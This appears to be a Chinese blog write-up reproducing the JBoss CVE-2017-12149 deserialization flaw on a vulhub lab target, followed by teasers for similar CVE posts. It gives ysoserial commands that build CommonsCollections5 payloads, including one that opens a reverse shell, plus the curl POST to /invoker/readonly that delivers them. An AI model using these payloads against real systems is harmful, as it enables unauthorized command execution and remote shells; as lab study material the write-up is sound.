JBoss 反序列化漏洞 CVE-2017-12149

发表于2026-02-13|更新于2026-03-15|漏洞

|总字数:479|阅读时长:1分钟

影响范围

JBoss AS 5.x - JBoss AS 6.1.0.Final

漏洞类型

Java 反序列化

操作系统限制

无

配置要求

http-invoker.sar 必须处于部署状态
ReadOnlyAccessFilter 过滤器映射

漏洞利用

命令执行，反弹 shell

利用原理

在 JBoss AS 5.x 或 6.x 中，引入名为 ReadOnlyAccessFilter 过滤器，其默认映射路径为/invoker/readonly，该路径在默认配置下无需身份验证就可访问，该过滤器处理客户端发送的 POST 请求数据时，直接获取请求体的输入流调用 readObject () 方法进行反序列化操作。在还原对象过程中，系统未对传入二进制流进行安全过滤、字节码校验或白名单限制，攻击者可以构造恶意序列化对象，恶意二进制数据通过 HTTP 请求发送到靶机，JBoss 在解析对象时，自动触发对象内部嵌套的恶意代码，执行恶意命令

漏洞复现

现成的 vulhub 来拉取镜像

#下载vulhub源代码
git clone https://github.com/vulhub/vulhub.git
#进入漏洞目录
cd vulhub/jboss/CVE-2017-12149
#拉取镜像
docker-compose up -d

1773507525350

访问 http://靶机 ip:8080/invoker/readonly，返回 500，说明存在漏洞

1773507561810

下载攻击工具并检查是否有 Java 环境

1
2
3

wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar -O ysoserial.jar
#检查Java环境
java -version

1773507621279

使用 ysoserial 生成序列化数据

1	java -jar ysoserial.jar CommonsCollections5 "touch /tmp/success" > payload.ser

1773507653348

发送恶意 payload

1	curl -X POST http://靶机ip:8080/invoker/readonly --data-binary @payload.ser

1773507692670

进入容器 tmp 目录，发现 success，说明成功执行命令

1773507717667

下面进行反弹 shell，开启 nc 监听端口

1773507754209

执行命令替换为反弹 shell 执行命令

1	java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,反弹shell的base64编码}\|{base64,-d}\|{bash,-i}" > payload.ser

1773507791344

发送恶意 payload

1	curl -X POST http://靶机ip:8080/invoker/readonly --data-binary @payload.ser

1773507874613

成功连接

1773507911281

文章作者: Johan

文章链接: https://cjh-1001.github.io/2026/02/13/CVE-2017-12149/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Johan的秘密小窝！

相关推荐

JBoss 反序列化漏洞 CVE-2017-7504

影响范围 JBoss AS 3.2.0 - 4.2.3.GA 漏洞类型Java 反序列化操作系统限制无配置要求默认配置漏洞利用命令执行，反弹 shell 利用原理JBoss AS 默认集成了一个用于 HTTP 协议传输信息的组件 JBossMQ，其组件含有一个名为 HTTPServerILServlet 的接口，该接口访问路径/jbossmq-httpil/HTTPServerILServlet 无需校验即可访问，Servlet 处理 POST 请求数据时，直接调用 readObject () 方法来反序列化数据流，且未对传入对象进行安全过滤或白名单限制，攻击者利用 yoserial 工具生成恶意系列化二进制数据，通过 HTTP 请求发送到靶机，JBoss 解析对象时自动触发对象内部嵌套的恶意代码漏洞复现现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/jboss/CVE-2017-7504#拉取镜像docker-compos...

Shiro 认证绕过漏洞 CVE-2020-1957

影响范围 Apache Shiro 1.0.0-incubating - 1.5.1 漏洞类型权限绕过操作系统限制无配置要求 Shiro 拦截器采用了路径匹配模式漏洞利用登录管理后台，信息泄露利用原理在 Shiro 的 1.5.2 之前的版本中，WebUtils.getPathWithinApplication() 方法处理 URL 时候会根据分号对路径进行截断，会认为分号后面不属于路径一部分；而 Spring 框架在匹配控制器路由时候，会对 URL 进行标准化处理（例如解析穿越符..），它对分号处理方式不同。二者对请求的解析不一样，攻击者通过特殊构造/;/路径来绕过 Shiro 的过滤漏洞复现现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/shiro/CVE-2020-1957#拉取镜像docker-compose up -d 抓取 http://靶机 ip:8080/admin 数据包发送到 Repeater...

Struts2 远程命令执行漏洞 CVE-2021-31805

影响范围 Struts 2.0.0 - 2.5.29 漏洞类型OGNL 表达式注入操作系统限制无配置要求默认配置漏洞利用执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测利用原理Struts 内部对象虽然被锁死了，但是 Struts2 运行在 Tomcat 容器，攻击者可以利用 Tomcat 的 InstanceManager 绕过沙箱（相当于 CVE-2021-31805 是对 CVE-2020-17530 修复的绕过），InstanceManager 新建的 org.apache.commons.collections.BeanMap 对象能绕过普通权限检查，直接操作 memberAccess 的私有属性，利用 BeanMap 的 put 方法把 excludedClasses（Struts2 内部的黑名单）改为空，再通过攻击链执行敏感命令。漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/s...

Struts2 远程代码执行漏洞 CVE-2017-5638

影响范围 Struts 2.3.5 – 2.3.31 Struts 2.5 – 2.5.10 漏洞类型OGNL 表达式注入操作系统限制无配置要求默认配置漏洞利用执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测利用原理漏洞产生主要原因是 Struts2 有一个复杂功能，给错误信息赋动态变量，构造的 payload 通过错误信息进入到动态变量，后续通过动态变量抛出报错信息同时执行敏感命令。Struts2 默认使用 Jakarta 库来解析上传文件，通过构造异常的 Content-Type，Jakarta 解析器无法识别并抛出该字符串错误，Struts2 将错误转化为可读错误提示，findText () 函数解析时候，错误信息内有 %(# 符号，识别为需要计算的表达式，OGNL 引擎解析并执行括号里面的 Java 代码，即敏感命令漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/struts2/s2-...

WebLogic 未授权命令执行漏洞复现 CVE-2020-14882

影响范围 Oracle WebLogic Server: 10.3.6.0.0 Oracle WebLogic Server: 12.1.3.0.0 Oracle WebLogic Server: 12.2.1.3.0 Oracle WebLogic Server: 12.2.1.4.0 Oracle WebLogic Server: 14.1.1.0.0 漏洞类型未授权访问、Java 反序列化操作系统限制无配置要求 7001 端口对外开放漏洞利用命令执行，信息泄露，反弹 shell 利用原理WebLogic 控制台的权限检验逻辑是，如果访问静态资源则直接放行，如果是敏感的管理页面，则检查 Cookie 确认登录状态，攻击者通过构造含静态路径字段的 payload 来绕过 WebLogic 前端拦截器，访问路径为 /console/css/../console.portal，WebLogic 内部引擎会对 url 编码部分进行解码，所以攻击者通过二次 url 编码构造成/console/css/%252e%252e%252fconsole.portal，来绕过 WebL...

Redis 沙盒逃逸漏洞 CVE-2022-0543

影响范围 Debian 10 (Buster) Redis 软件包: 5.0 - 5.0.14-1 Debian 11 (Bullseye) Redis 软件包: 6.0 - 6.0.16-1 Ubuntu 18.04 LTS Redis 软件包: 4.0.0 - 4.0.9-1ubuntu0.2 Ubuntu 20.04 LTS Redis 软件包: 5.0.0 - 5.0.7-2ubuntu0.1 Ubuntu 22.04 LTS Redis 软件包: 6.0.0 - 6.0.15-1ubuntu0.1 Docker Redis (Debian / Bullseye 变体) 镜像: 5.0.0 - 5.0.14 Docker Redis (Debian / Bullseye 变体) 镜像: 6.0.0 - 6.0.15 Kali Linux Redis 软件包: 5.0.0 - 6.0.15 Raspbian (树莓派) Redis 软件包: 4.0.0 - 6.0.15 其他 Debian 系衍生版 Redis 软件包: 4.0.0 - 7.0.0-rc2 漏洞类型Red...

评论

数据加载中